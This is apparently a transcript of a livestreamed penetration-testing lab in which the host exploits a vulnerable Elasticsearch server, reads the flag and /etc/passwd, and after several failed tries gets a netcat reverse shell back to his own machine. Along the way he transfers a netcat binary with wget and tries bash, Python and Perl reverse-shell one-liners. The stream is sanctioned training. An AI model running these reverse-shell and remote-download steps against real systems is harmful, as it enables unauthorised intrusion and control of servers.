What's going on, people? What's going on, people? Oops. What's going on, people? Oops. Had to turn that off so we don't hear the echo stuff. Hello, Samuel. Hello, Rohit. Hello, Cybora. Is this your first time here, Samuel? Okay, fellas. So, what I want to do today is actually go through another exercise or scenario. So, glad to have you here, Samuel. What I want to do today is go through a scenario, through a penetration testing scenario, which is like sort of real life, the stuff that I like. And yeah, maybe if you guys want, we'll also do some Python, but I want to focus mostly on the penetration testing scenario, and I want to keep it shortly in less than an hour. If I get stuck because I didn't look through the entire thing beforehand, if I get stuck, I don't want to waste too much time. If I'm not able to like move on or I don't know, with your help or with your feedback, if I'm not able to move on, then we're actually going to look into the walkthrough and try to see what is going on. But hopefully, we'll not get into that. Okay, so we have 9 of you here. I also want to remind you that I will be answering your questions throughout the entire live stream, so make sure to leave them in the chat. What I want to announce, so let's look for a little bit. Hello, Shivansh. What I want to announce is that YouTube actually enabled. What did they enable for me? They enabled the memberships. So let's look a little bit into that. You can see my screen now, I believe. Alright, so YouTube actually enabled memberships for my channel, which means that you can join, so you can hit the join button here, and that's actually, there are 3 tiers. Um, there are 3 tiers in which you can join or become a member of my channel. And what does that actually mean? So let me see if I recall them from the top of my head. There are 3 tiers. So the first tier is the fan tier, in which you get access if you join the fan tier, which I believe is $3 a month. If you join the fan tier, then you'll actually gonna have access with you're gonna have discounts for all the stuff that I have, all my courses and my books and all that stuff. You're gonna get discounts for that. The second tier is the Loyal Plus tier, in which you will have access aside of everything you have for the for the fan tier. You also have access to let me see, live members only live chat. So I'm gonna do live chats with members only, with those who have subscribed to Loyal Plus, and I'm actually gonna answer their questions, and we're gonna engage in a live chat, and maybe at some point we'll also gonna do some private live penetration testing. So that's only gonna be for those in the Loyal Plus. And then you also have the Die Hard fan or something like that that I created yesterday. And the Die Hard fan tier is going to have access to everything of the previous 2 tiers, so to discounts and to members only live chats. And on top of that, they'll also be able to communicate directly with me via private message, ask me questions, and pick my brain. So yeah, that's that. and let's just move on. Getting back to my screen over here. So once again, please leave all your questions that you have with respect to cybersecurity penetration testing, bug bounties, and all that stuff, whatever you have, leave them in the chat. And now let me disable, put Streamlabs in performance mode and actually get going. Okay, so maybe we'll look into this list as well. This is the Discord server if you want to join. So maybe we're gonna do some Python challenges by the end of the stream if we're able to finish in due time. So what I expect from this live stream and for all the live stream is that you don't just look at what I'm doing. I'm going to ask for your active participation. So I will be looking forward to your engagement with this exercise. This scenario as it appears here, so let me click on run, and I'm gonna let it start while I actually present it. So it's a vulnerable search and analytics engine. Okay. The target server, so the description. The target server, as described below, is running a vulnerable search and analytics engine. Your task. So, guys, tell me if you hear me well. Let me know in the chat if you hear me well, because I don't want to speak to the microphone and actually realize that it is muted or stuff like that. Tell me if you hear me well. All right. Okay. So getting back to our scenario here, we have a vulnerable search and analytics engine. Your task is to fingerprint the service using tools available on the Kali machine and then exploit the application using the appropriate method. Exploit the service and retrieve the flag. So we are instructed not to use Metasploit. What else? The Kali IP is at 192.xyz. And the target server is located at XY3. Okay, and we're also not allowed to attack. I wouldn't attack it either way. The gateway at XY1. Then we have to verify the flags, of course. So in case we get stuck and none of you and I are able to actually move on in due time, I'm actually gonna look into this manual here, which is probably the solution. So we have a simple network architecture. We have our target, this is us, and this is the switch. This may not be so useful in case of simple scenarios like this one, but in case of a larger architecture or a more complicated scenario, the graph might be more useful. So I'm going to click on the lab link to jump right into it. Okay, so hello dosing, thanks for confirming that the stream is going well. All right, and here we are. So let's do a ifconfig. Can you guys see this well enough, or you want me to actually, like, is this better? Let me know. Should be better, I guess. Okay, so ifconfig, we are at 31462, and as instructed here, the target is at .3. So our target should be at 192.31463. Okay. Now let's do the most basic nmap of all, 192. Dang. So I forgot the IP address. So nmap minus sv 192.3.146.3. So this is where our attack, our victim machine should be located. Okay, so let's see. Port 9200, Elasticsearch REST API 142. This is what we're dealing with. So a simplistic, really simplistic scenario. Exploit the application. So in this case, we should be assuming that this type of this application is vulnerable. Let me just copy this and then let's go to DuckDuck here and then say exploit. This is using Metasploit. This is probably the public exploit from ExploitDB, and then we have this one. So yeah, this is the Metasploit actually, and then we have this 140 smaller than 142. So it's ours is 142. Maybe this isn't gonna work, but let's see. So the only thing that we have to do is just run this thing. Is it really that simple? Let's see what's this all about. So this is where the actual meat of the thing is, and it's executing a who am I. We'll just try this. Exploit.sh. What do they... This is probably for Docker. Anyways, let's just copy this thing here. This bash thing. Or I could just wget it. So let's... no, I don't think I can wget it. Let's see, what do we have here? Let's nano into exploit.sh and then control. Let's just paste it. Not that. But paste the actual code. Paste. Okay, looking good, I guess. Control O, enter, Control X, cat exploit. So what do we actually need to do is to run the exploit, and the only thing that we have to modify is the target. Host and port. So we're going to change mode +X to execute the exploit, and then exploit.sh we have our 192. Again, I forgot it. ifconfig edh1 so exploit.sh 192.3.146.3.9200, and in this case, since the exploit the code was running a so this is a remote code execution, and it runs the whoami command. And in this case, we should probably get, I don't know, maybe dub or Apache or root. Let's see. Let's see if it works. Maybe this isn't the right exploit. I don't know. I don't think it wasn't 30. Yeah, so it's 192.3. Who am I root? Dang. So yeah, it was simple. Let's actually modify this thing, and how would you guys go about it to get the flag? Because that's what we have to do, exploit the service and retrieve the flag. We could simply modify this line over here, and instead of who am I, so we are root, let's do a ls minus a root, see if this works. And it actually does. Let's modify it again. And let's look into, let's cat etc password, Control-O-Enter. Okay, so this is the output. etc password. What else can we do? We could try getting a shell on the server. Yeah, so we could get a shell on the server, but first I would have to start a listener over here. I don't think I can run multiple instances of this thing. Can I? Apparently I can. Okay. So this might actually work. So what I want to do is, since we're able to run commands as root, we should be able to get a shell. And probably the easiest way in which I think we could get a shell is with using, so I'm going to start a listener nc-lvp with netcat on port 444 over here, and I'm going to send, so I'm going to have to modify the exploit, so nano exploit.sh, and actually send a shell. So this would actually be nc-e bin bash minus p, what was it? So nc-lvp If I'm opening it over here, I have config EDH1. If I'm listening on port 444, and then over here I'm sending a bin bash. Since I'm executing it as root, I'm going to send a bin bash shell with root privileges to my IP over here, which is 31462. So it's 192.3.1.4.6.2, and the port is 444. Hopefully I'm not mistaken. And then if I'm executing this, I should be receiving a root shell over here, a connection back to my listener, to my netcat listener. So exploit.sh, and then the IP, which I keep forgetting. Hopefully this is it. Do we also have to specify the port? Yeah. So nothing came. 192.3.1.4.6.2. Let's look at the modification. 192.3.1.4.6.2. I don't think there's anything wrong with my command over there. What do you guys say? Hey Gorilla, what's going on? So yeah, -e doesn't work. In this case, we could go and try a different type of payload, like a different type of command over here. We could, maybe netcat is not installed, or maybe it's like messed up on this machine. We could try payload all the things. What was it? I guess. Or not. I don't think it's this one. It's reverse shell cheat sheet. This was it. Okay, so how many minutes are we in, fellas? 24 minutes in. Okay, so reverse shell cheat sheet from Pentest Monkey. We could try this thing. It's probably the easiest. Let's modify this over here. Why don't I just do something more programmatically here and take this as a command line argument? Maybe this is gonna work. Yeah, let's see, Control O, enter, Control X, and in this case, if I run the exploit, it's gonna have to be, so this is the 0 with command line argument, this is the first one, it's probably gonna have to be the second command line argument. I think so. So not the first, but the second. Or the third. Because if we look over here, we have 1, we have 2. The host is 1. I think it's the second. Let's actually try and see if it works. So for example, running the exploit, and let's do the command who am I. So in this case, what I wrote there is what I did here In this case, this is a placeholder. So whatever command I put after the host and the port, it's going to be executed inside in here, hopefully. So let's see. Let's execute who am I. Doesn't seem to be running. So then we'll try execute third. Still. So I'm missing here. My bash skills aren't as good as I thought they were. What is going on? What if I do... What do you guys say? Hello, Saluk. So getting back here. Exploit.sh. Please inform unhost as parameter. So if there is yeah, it was the second. So this is number 1. Do I have to actually run it like that? So it's gonna be number 2. That's my best bet. My best bet is that here we're gonna have in the same format number 2. Is this gonna work? What do you say, guys? So now exploit who am I? Doesn't work. What if I do ID? Still. What am I missing? That should be the first. Do I need to enclose it? It's probably weird on the way it executes. So anyway, if you guys have ideas, hello Prokar. So what I'm actually trying to do here is that I don't wanna have to actually hard code the command, for example, in this case, who am I, in here. So I'm gonna save this, Control X, and if I run the exploit, it's gonna tell me that I'm root. Okay, I wanna take the command from there as a command line argument. So I wanna have, in this case, I want to take it as a command line argument. So that's why I was using the $ and 2. I tried between the accolades, it still didn't work. So I'm not actually sure what I'm doing wrong here. Maybe it's the way this exploit was built. Still, as you can see, it successfully takes the host as the first command line argument. Any suggestions? Well, why would I only try the $? Gorilla. because that doesn't actually it doesn't stand for anything. It's only the dollar sign, and you have to specify the number, the position of your command line argument. But anyway, we're missing the point. If you guys have suggestions on how to take it as a command line argument, well, I'm more than open. What if we break this like that? Is that even possible? I'm just saying. Let's see. It's not. So first I was breaking it. Take the second command line argument. Try again. Still. It was without that. What if we don't need to use the parentheses? And it's simply like that. I don't think so. Yeah, that's not right. Okay, so going back here, I want to make sure that this works. Okay, so it works. Now let's try to actually get a reverse shell. We're going to modify this thing and actually say our IP is 192.3.146.2. The port of our listener is 444. So netcat is still listening, hopefully. I'm actually going to paste this. And then run it. I guess it didn't run. Yeah. Let's try something else. What do you mean dollar sign and dollar sign? How many minutes are we in? 35 minutes, dang. It's not, I don't think you have to use at. But anyway, that's not the point. The point is to get a reverse shell here. So let's try a reverse shell using, do we have Python running? So let's modify this and ask which Python? user bin Python. We have Python. We could try this thing, but with all these quotes, single quotes and double quotes, it might break the code. But we can try. And I'm going to modify it here. So we're going to have to modify the IP address, which is 192.3.46 or 146. It's 146. Dot 2. 146.2, and on port 444, gonna copy that entire sausage into here. I have a feeling that it might not run or execute. Syntax error of the course. Shall we try Perl? Do we have netcat? That's the question. And it terminates over here, which and C. Something's wrong. But what is wrong? Did I mess it up? So it's who am I? Yeah, I think I messed it up. Paste. Okay, back on track. Which netcat? Interesting. Okay, so what I want to show you guys is that we don't have to do all that thing. Let me see if I can cat. Or let me see if I can list this, the root of the victim machine. And we can. So we have bin, boot, dev, Elasticsearch. We also have the flag. And this is probably, if I do a cat flag, and then there you go, we have the flag here. I could simply copy this. I believe that's the right flag. And then go over here, paste it, verify. We are verified. But what I want to do, so this was actually quite simple. What I want to do Make it like variable and paste it. What should I make it as a variable? Gorilla. So we've already completed this exercise, but I want to see if I'm able to actually get a reverse shell here. What are you saying that I should make it as a variable? So this is the command that is being escaped here or something. Netcat should run, I think. What if I try ls bin Can you see netcat over here? And ping should be nnc or something. Sleep sh. What if it's in user bin netcat? Let's modify it again. It often is that netcat is in user bin and rpyp and curl. We might not have netcat here. Okay. What if I try something? I wanna test if this exploit and the command over here is able to communicate with my open port, my listening port here 444. So I could simply try a wget 192.3.146.2 on port 444, and let me just save this, and when I run this we should see something not found, or we should see some output over here when I run the exploit. And as you can see, it is able to communicate. And there's nothing that I can do. So I believe there is the communication between the two is possible. What I have to find out, so I'm going to Control C here and Control C here as well. What I need to find out is a good reverse shell. Open to suggestions. ncat. Okay. Suggestion taken. Let's see if there is ncat. We don't know if it is. So which ncat? Nothing in there. We don't have netcat or ncat. I could try ncat. Does the ncat have -e? Let me see here. ncat -e. Do we have ncat -e? What's this? ncat user's guide. Basic usage. -L. Maybe there's no ncat. What if I open up? Well, there's no nc or ncat. Let's see what are we dealing with? Linux 4.15. So, what are you saying here, guys? I tried the bash reverse shell, but it didn't work. For some reason, it actually broke the code, and it wasn't able to execute. I think the if we look into the exploit, pasting it directly over here, the bash thing somehow broke the escapes, I guess, because it didn't work. I could try it one more time. So we have our IP is 192.3.146.2, and the port that I want to connect to my listener is 444. And then if I plug that in here, if I paste it in here, for some reason I guess it breaks the code or the quotes. See? Let me run it one more time. And we got nothing here. So I have to find something else if I really want it. But I don't know. I mean, I already completed this because I got the flag. But it's a bit frustrating. I would like to get a reverse shell. Which semicolon? The last one? Where is it? So you're saying that I should remove this. This might have not worked. Yeah, that didn't work. You can do that. So you're asking, what if try use wget to download shell on victim machine and try to execute it? What I could do on the victim machine is to actually transfer netcat. So that's a good idea, I think. If there is no netcat on the victim machine, so I could try and see. No, what I should do is simply locate NC over here. I mean, which NC? In this case, we have bin NC. So copy bin NC to where I'm at this moment. And then in this case, I could simply open up a Python -m simple HTTP server. I should actually do it over here. So Python -m simple HTTP server port 800, and it's serving on port 800. And in this case, I'm gonna modify the exploit. Okay. So what I'm actually gonna modify it into, and if this works, I'm gonna call it a night. Meanwhile, fellas, please ask your cybersecurity related questions into the chat over here, because I want to answer a couple of questions before I leave. So let's see. What was I doing? Yeah. So I'm gonna download. So to clarify, I started a simple HTTP server on port 800, and I'm gonna get netcat, assuming that the victim machine doesn't have netcat on it. I'm gonna wget 192.3146.2 port 800. I'm gonna get netcat into TMP. Let's see if that works. Control O to save, Control X, clear. I'm gonna fire up the exploit, and we should see something over here. If it works, of course. Of the course. Okay, so this might have worked. Let's actually list the contents of temp. See if we have netcat in there. And actually chain commands here. So let's ls tmp, and then the second command would be chmod +x tmp nc. See if that works. It didn't. Let's do again. Let's only do ls-a/tmp. So our netcat isn't in there, is it? It might have not been able to save it. I could try it one more time. Let's see what's the present working directory. And let's also do wget 192 31462 800 and see if this works. It didn't allow chaining commands. So we are at the top. Modifying this one more time. So what I actually want to do here is just do the wget and see if it saves it. It says 200. This is interesting. I mean, I remember that during my OSCP training, I did a lot of stuff like this. I mean, a lot of trial and error. And this is how you actually learn a lot, because there might be something over here that breaks the code and I'm not really sure why. We might have the issue that ANSI isn't available. There might be the issue that we cannot transfer files, but since we are root, we should be able to transfer files. I could try, what should I try? Let me see if it actually got it. Do we see an NC here somewhere? It's here. NNC. Okay, so it might have been transferred. Now, if I do NC minus, let me just connect with netcat now to 31462 on port 800, we should see some, if that works, we should see something in there. Nothing. Let's change mode +X to NC. And then NC minus E bin sh 192 31462 on port 444 NC minus LVP 444 NC minus E bin sh nothing. Okay, so I'm out of ideas. What are you saying, Samuel? Type it in. You should remove the semicolon and put 1. That is the standard output. What semicolon should I remove? Tell me. Tell me, because I ran out of ideas. What else should I do? I mean, we're already 1 hour in. Damn it. On the bash reverse shell. Didn't I just try that? So you're saying this one, the semicolon. I did remove it. What should I do there then? And put 1, that is the standard output. So you're saying like this. Is that what you're saying? Okay. You're saying that's the standard output. One 192.3.146. One more time. 2. Okay. It didn't. It didn't work. Suggestions. We are in this together. So one way would be to create a variable like one of you guys said. Can I try to... remove minus RF everything? Of course. Yeah, that would do it. It would wipe the entire thing out. And we could just go home. So what would you do in this type of situation? Do we have any other types of reverse shell suggestions? Would this break our... I'm a bit clueless. And I'm gonna keep trying at it like for another 10 or more minutes, and then I'm gonna call it a day because we already got the flag, and this is actually optional. And I don't want to keep you guys here while I try all sorts of stuff. Do we actually need this here? This escape and this one? Do we need those? We might, right? Let's see. We might. So how was it like that? And then like this, or like this, like that. What if we put single quotes? Would it still work? It won't. Has to be double. Okay. Add C flag. We have NC here, and we have another one. So we have two netcats. It's there, but it doesn't work. Shadi, what about trying Metasploit to get a reverse shell? Metasploit is out of the question as per the instructions. Do not use Metasploit to exploit the service. So we aren't allowed to use Metasploit. It's all we have here. We have the netcat thing. What if we open up a listener NC minus LVP on port 444 and then run the exploit, and then here NC minus that wasn't right. So minus E bin bash, run the exploit, and see 192.3.146.3.444. Connection refused. It didn't open up the listener. Could we echo something? I have all sorts of ideas here. What if I echo and see 192.3.146.2 port 444 minus E bin bash, echo that into scr.sh, see if we have it, and then let's see if that thing wrote. We could do a cat scr.sh. Nothing in there. Okay, any other suggestions? Come on, guys. Okay, so I think we've tried quite a few things, and I remember that we have a solutions here, a lab manual. So like I said, we already completed this. We got the flag, we just read the flag, but I wanted to actually get a reverse shell, and I wasn't able to get a reverse shell. So In this case, we should download this lab manual and look into it if you don't have any other suggestions. And I think you might not. So let's look and see what they're suggesting here. So nmap minus ss, we only did the minus sv. I think they got the same exploit, right? CVE 2015. Exploit the vulnerability and read the Etsy shadow. Cat Etsy shadow. Okay. We can execute system commands on remote target server. Perl. Did we try Perl? I don't think we did. They used the Perl thing. The Perl reverse. I don't think we tried Perl. Come on. Seriously? So the Perl one. Let's see. Let's modify this one. So where's the IP? It's in here. 192.3.146.2 port 444. Copy this entire thing. And then paste it in here. I don't think it's gonna work. Or it might. NC minus LVP. NC minus LVP 444. And then over here, yeah, we got a syntax error. So what's going on here? All right, yeah, so they actually created, I see. Clear nano, let's call it back. Paste that entire command in here. Cat back. Okay. 192.3.146.2. Then do another Python server or something. Upload the backdoor file on target machine. Didn't I do that? I mean, I tried with ncat, but I didn't try with Perl. So let's modify here in the following way. Delete everything. So wget 192.3.146. Hopefully this is gonna end here. 1462 on port 800, and we want to get the back. Like that. Apparently it took it, it got it, and then chmod plus x back, plus x back. Interesting how it sounds. And then finally, if that thing is in there, we should purl it, or we should bash it. Like that. But before that, we have to start a listener here. So clear nc minus lvb 444, and then this. Come on, seriously? Okay. Alright, so what did I do wrong here? I didn't go all the way to the end. So I tried bash, I tried Python, so I skipped Perl, I don't know why. I tried different sorts of netcats, nothing worked. And then I just did the Perl thing and it worked. Does it work with bash? Let's go and see. So we are on the victim machine. We have the flag, we have the NC. Let's see if let's try and see if NC works. Let's change mode plus X to NC, and then NC minus LVP 444. It says command not found, but if I do this, so this was my mistake. Another one of my mistakes. This is gonna work. See? So I'm back on attack defense because I hit Control C. And I'm back on attack defense, and I'm gonna try to do the same exploit in this case. Where are we? Yeah, so over here, I'm gonna modify this. And so I actually transferred netcat to the victim machine, but I didn't execute netcat correctly. First off, I should have changed mode plus X. So change mode plus X to NC, and then instead of executing it with NC minus E bin bash blah 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 192.3.146.2 port 400 444, I should have executed it with dot slash forward slash, and this should work. Control X, clear. I'm gonna start the listener over here one more time, NC minus LVP 444, and now I'm going to execute the exploit, which is gonna execute the netcat command on the victim machine. And it didn't work, or did? It seems that it did work. Did it? Let's do bash minus I. Or not. We don't see a flag here. We do see the flag. So it did work. Yeah, we're on the victim. Clear doesn't work. sh minus I. So we are on a low-end netcat shell now, and it actually worked. Okay, that would be it. Any question, guys? Any questions? Let me just mute my notifications here. Okay, so I think someone asked a question: which pen testing should we start, from web or network, as a beginner? Well, and I'm gonna answer this question, and I'm gonna leave. If you guys don't have any other questions, I'm going to end the stream. So someone trying to spam here. Let me see if I can just send them off. How do I ban this? Okay. I think that was right. Alright, so what was the question? Whether or not someone should start with web penetration testing or with network penetration testing as a beginner. So I would say that you should start with network penetration testing, because that way you will better understand how everything works under the hood. Because if you start with web app penetration testing, it might be a bit easier in terms of tools and stuff that you can use, but if you don't know how applications communicate with if you don't know how applications communicate with themselves, like if you don't know how to communicate with a web application in terms of network interfaces, I don't think that you will be very successful in your career as a penetration tester. So I would say go with network penetration testing. Hello, Gothic. Did you just get here? So yeah, fellas, I think I'm gonna call it a day. Once again, so welcome. I think we're at the end of the stream, Gothic. You can click on join to actually get the three types of tiers. With the join, you have three tiers. Like I said, you have the fan tier, where you get discounts for all my stuff, my courses and my books. You have the loyal plus tier, where you get access to members only live chat, which are going to be private live chats. And you have the ultimate tier, which is die hard tier, where you get access, you get to ask me private questions. And finally, if you guys want to learn Python, I have a course on Python, and if you're part of the tier, you can get it at a discount. So the first part is Python basics. So this is the course that's up and running. You can get here and enroll either on Udemy or on CourseCraft, or you can send me a message if you are part of the tier, and I'm gonna give you a discount on this. This is what you're actually learning. So this is the basis of Python if you want to learn for penetration testing. And then I'm still working on this. I don't know when it's gonna be up and running. Alrighty, fellas. So it was a pleasure. I want to wish you all a Merry Christmas to all of you who celebrate Christmas. Um, so there's like 24 hours. So tomorrow is like Christmas Eve. We celebrate it here in Romania, and I'm really looking forward to Christmas dinner. And I might do another stream in the next couple of days, maybe December 27th. And we could also do some more attack defense labs, which was really interesting today. And of course, some more Python. We didn't do any Python in here in today's live stream. All right, so well, with that said, I will be seeing you soon. Peace out.